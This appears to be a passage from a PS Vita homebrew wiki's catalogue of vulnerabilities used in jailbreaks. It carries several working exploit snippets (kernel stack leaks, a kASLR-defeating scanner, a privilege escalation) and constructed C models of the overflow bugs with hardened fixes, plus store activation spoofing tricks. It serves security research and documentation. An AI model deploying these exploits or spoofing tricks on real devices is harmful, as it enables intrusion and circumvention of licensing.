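The overflow in the header check, as an added example in C (not boot ROM code): the field layout beyond "code_size at offset 0x10", the <code>LOAD_LIMIT</code> bound and the hardened variant are assumptions. It shows the sum wrapping to 0, the copy length underflowing to 0xffffffc0, and a check that bounds each operand before adding so neither the sum nor the subtraction can wrap.<br />
<br />
```c
#include <stdint.h>
#include <stdbool.h>

/*
 * Model of the Enc header check the text describes (added example; the field
 * layout beyond "code_size at offset 0x10" and the load limit are assumptions,
 * not the boot ROM's values).
 */
#define ENC_HEADER_SIZE 0x40u
#define LOAD_LIMIT      0x40000u    /* hypothetical size of the destination buffer */

typedef struct {
    uint32_t offset_code;   /* offset to code, relative to the start of the Enc */
    uint32_t code_size;     /* the field at header offset 0x10 */
} enc_header_t;

/* Vulnerable: only the sum is checked, so code_size == -offset_code wraps to 0 and passes. */
bool enc_check_vulnerable(const enc_header_t *h, uint32_t *copy_len)
{
    uint32_t end = h->offset_code + h->code_size;    /* 32-bit wrap-around */
    if (end > LOAD_LIMIT) {
        return false;
    }
    *copy_len = end - ENC_HEADER_SIZE;                /* underflows to 0xffffffc0 when end == 0 */
    return true;
}

/* Hardened: bound each operand first, so the sum cannot wrap and the subtraction cannot underflow. */
bool enc_check_hardened(const enc_header_t *h, uint32_t *copy_len)
{
    if (h->offset_code < ENC_HEADER_SIZE || h->offset_code > LOAD_LIMIT) {
        return false;
    }
    if (h->code_size > LOAD_LIMIT - h->offset_code) {  /* right-hand side cannot go negative */
        return false;
    }
    *copy_len = h->offset_code + h->code_size - ENC_HEADER_SIZE;
    return true;
}

/* Copy length the vulnerable check would use for a header, or -1 if it rejects it. */
int64_t vulnerable_copy_len(uint32_t offset_code, uint32_t code_size)
{
    enc_header_t h = { offset_code, code_size };
    uint32_t len = 0;
    return enc_check_vulnerable(&h, &len) ? (int64_t)len : -1;
}

/* Same for the hardened check. */
int64_t hardened_copy_len(uint32_t offset_code, uint32_t code_size)
{
    enc_header_t h = { offset_code, code_size };
    uint32_t len = 0;
    return enc_check_hardened(&h, &len) ? (int64_t)len : -1;
}
```

With <code>offset_code = 0x1000</code> and <code>code_size = 0xFFFFF000</code> the vulnerable check accepts the header and hands back a copy length of 0xFFFFFFC0, which is the huge copy the text describes; the hardened check rejects the same header because code_size alone exceeds what fits below the limit.<br />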
<br />
== F00D Processor ==<br />
<br />
=== secure_kernel ===<br />
<br />
==== octopus exploit ====<br />
(2017-02-18) F00D secure_kernel module loading does not check the source address and therefore provides an oracle allowing a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
==== Heap buffer overflow in update_service_sm ====<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11505Vulnerabilities2019-09-18T22:57:18Z<p>Xyz: </p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku can be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next PSVita kernel exploit, named 2050 and 2051. TheFloW also has a WebKit exploit, which may or may not be the same as xyz's.<br />
<br />
Works on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PS Store in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <= 3.51.<br />
<br />
PSM apps cannot work on FW >= 3.52 because they are blacklisted in the PSVita OS. This can only be bypassed with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 and lower were compiled as statically linked executables: their loading address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also do not have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings in the hope of smashing the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the save parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into one of a list of buffers. It does not validate the length, so if we put the \n delimiter far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. It is in the data section instead, but luckily the content after the buffer is the list of destinations for the other lines. If we overflow into the list and redirect a destination, the next line is copied to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
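A model of the parser behaviour described above, as an added example in C (not the game's code and not h-encore): the layout, a 16-byte line buffer followed directly by the table of destinations, and the simulated 32-bit address space are assumptions. The constructed save overflows the first line into the table so that the second line lands at a chosen offset; the hardened variant rejects the oversized line.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <string.h>

/*
 * Model of the save parser the write-up describes (added example, not the
 * game's code). The "process" lives in a small simulated 32-bit address space,
 * so overwritten destination entries are offsets into that arena rather than
 * host pointers. Layout is an assumption: a 16-byte line buffer followed
 * directly by the table of destinations for the lines after it.
 */
#define ARENA_SIZE     0x1000u
#define LINE_BUF_OFF   0x100u                           /* char line_buf[16]        */
#define LINE_BUF_SIZE  16u
#define DEST_TABLE_OFF (LINE_BUF_OFF + LINE_BUF_SIZE)   /* uint32_t dest[MAX_LINES] */
#define MAX_LINES      4u
#define SPARE_BUF_OFF  0x200u                           /* default buffers for lines 1..3 */
#define TARGET_OFF     0x800u                           /* where the constructed save writes line 1 */

static uint32_t rd32(const uint8_t *mem, uint32_t off)
{
    return (uint32_t)mem[off] | (uint32_t)mem[off + 1] << 8 |
           (uint32_t)mem[off + 2] << 16 | (uint32_t)mem[off + 3] << 24;
}

static void wr32(uint8_t *mem, uint32_t off, uint32_t v)
{
    mem[off] = v & 0xFF;             mem[off + 1] = (v >> 8) & 0xFF;
    mem[off + 2] = (v >> 16) & 0xFF; mem[off + 3] = (v >> 24) & 0xFF;
}

/* Parser state: dest[0] is the line buffer, dest[i] a spare buffer for i >= 1. */
void parser_init(uint8_t *mem)
{
    memset(mem, 0, ARENA_SIZE);
    for (uint32_t i = 0; i < MAX_LINES; i++) {
        wr32(mem, DEST_TABLE_OFF + 4 * i, i == 0 ? LINE_BUF_OFF : SPARE_BUF_OFF + LINE_BUF_SIZE * i);
    }
}

/*
 * Copy each '\n'-delimited line to dest[i]. With hardened == false the length is
 * not validated, as in the game: a long first line runs past the line buffer into
 * the destination table, and the next line is copied to wherever the overwritten
 * entry points. Returns the number of lines copied, or -1 if rejected.
 */
int parse_save(uint8_t *mem, const char *save, size_t save_len, bool hardened)
{
    size_t pos = 0;
    int line = 0;
    while (pos < save_len && line < (int)MAX_LINES) {
        const char *nl = memchr(save + pos, '\n', save_len - pos);
        size_t len = nl ? (size_t)(nl - (save + pos)) : save_len - pos;
        uint32_t dest = rd32(mem, DEST_TABLE_OFF + 4 * line);
        if (hardened && len >= LINE_BUF_SIZE) {
            return -1;                          /* the missing check: line must fit the buffer */
        }
        if (dest + len > ARENA_SIZE) {
            return -1;                          /* model-only guard so the host process stays inside the arena */
        }
        memcpy(mem + dest, save + pos, len);    /* unbounded copy into the 16-byte buffer */
        pos += len + 1;
        line++;
    }
    return line;
}

/*
 * Constructed save: line 0 is 16 filler bytes followed by new values for dest[0]
 * (kept as the line buffer) and dest[1] (redirected to TARGET_OFF); line 1 then
 * lands at TARGET_OFF. Neither offset contains a 0x0A byte, so the entries do not split a line.
 */
size_t build_malicious_save(uint8_t *out)
{
    size_t n = 0;
    memset(out + n, 'A', LINE_BUF_SIZE);   n += LINE_BUF_SIZE;
    wr32(out, (uint32_t)n, LINE_BUF_OFF);  n += 4;
    wr32(out, (uint32_t)n, TARGET_OFF);    n += 4;
    out[n++] = '\n';
    memcpy(out + n, "PWNED\n", 6);         n += 6;
    return n;
}

/* 1 if line 1 landed at TARGET_OFF, 0 if it did not, -1 if the parser rejected the save. */
int demo_redirect(bool hardened)
{
    uint8_t mem[ARENA_SIZE];
    uint8_t save[64];
    parser_init(mem);
    size_t n = build_malicious_save(save);
    int lines = parse_save(mem, (const char *)save, n, hardened);
    if (lines < 0) return -1;
    return memcmp(mem + TARGET_OFF, "PWNED", 5) == 0 ? 1 : 0;
}

/* A well-formed save is parsed into the expected buffers by the hardened parser. */
int demo_benign(void)
{
    uint8_t mem[ARENA_SIZE];
    static const char save[] = "hello\nworld\n";   /* constructed, well-formed save */
    parser_init(mem);
    if (parse_save(mem, save, sizeof save - 1, true) != 2) return 0;
    return memcmp(mem + LINE_BUF_OFF, "hello", 5) == 0 &&
           memcmp(mem + SPARE_BUF_OFF + LINE_BUF_SIZE, "world", 5) == 0;
}
```

The redirected entry holds a little-endian offset, so the payload bytes must not contain the 0x0A delimiter; 0x800 was chosen for that reason, and the same constraint would apply to real pointers in any newline-delimited save.<br />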
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC does not sanity-check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif files downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use a PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, activation stays possible as long as the PS3 store is not secured.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can overflow syscall table and cause an arbitrary kernel function pointer to be dereferenced then executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id will end the svc interrupt without clearing syscall table vaddr in r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in an fself. Since at least firmware 1.030, it works only via WebKit exploits (not from fself or games, but possibly from ePSP or PSM).<br />
<br />
Call some functions that leave interesting data on the kernel stack (i.e. invoke some syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack back in the output buffer!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with 0x66 bytes so untouched bytes are recognisable in the dump<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate the kernel stack with something interesting<br />
<br />
// kernel stack leak: the output buffer comes back without being initialised<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
<br />
// check what was actually written to outbuf (hex_dump is a helper of your own)<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched in 3.68 or in the firmware just before. These exploits are not usable on retail/testkit because the functions involved are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst wraps around and yields a value smaller than dst. As a consequence, the later comparison evaluates to false whether it is signed or unsigned, so memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
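A constructed model of the two checks described above, added here as an illustration (it is not code from the page, from h-encore, or the Vita's memcpy): the 32-byte threshold comes from the text, while the 4-byte loop step, the address values and the hardened variant are assumptions.<br />

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

/* Constructed model of the two memcpy checks; not the Vita's memcpy. */

enum copy_path { PATH_SMALL, PATH_LOOP };

/* Bug 1 (integer overflow): the end pointer is formed as dst + len. A
 * negative len wraps, so end < dst + 32 holds and the "fewer than 32
 * bytes" path is selected even though len is huge when read as unsigned.
 * The outcome is the same for a signed or an unsigned comparison. */
enum copy_path vulnerable_select_path(uintptr_t dst, int32_t len)
{
    uintptr_t end = dst + (uintptr_t)(intptr_t)len;  /* wraps for len < 0 */
    if (end < dst + 32)
        return PATH_SMALL;
    return PATH_LOOP;
}

/* Bug 2 (signed length comparison): the copy loop guard treats the length
 * as signed, so a negative length yields zero iterations instead of an
 * error. Returns the number of 4-byte iterations the loop would run. */
uint32_t vulnerable_loop_iterations(int32_t len)
{
    uint32_t iterations = 0;
    for (int32_t remaining = len; remaining > 0; remaining -= 4)
        iterations++;
    return iterations;
}

/* Hardened check: the length is unsigned, bounded, and compared against the
 * room left before dst_limit instead of against a possibly wrapped sum. */
bool hardened_length_ok(uintptr_t dst, uintptr_t dst_limit, size_t len)
{
    if (dst > dst_limit)
        return false;
    if (len > (size_t)INT32_MAX)        /* rejects "negative" lengths outright */
        return false;
    if (len > dst_limit - dst)          /* room computed by subtraction: cannot wrap */
        return false;
    return true;
}
```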
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. However, at this time Yifan was trying to exploit it with an adjacent malloc (controlled_size), couldn't find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check an error return: if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written was used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of 1.80 TrustZone module imports/exports is available at [[File:Psvita_1.80_tz_nids.txt]].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
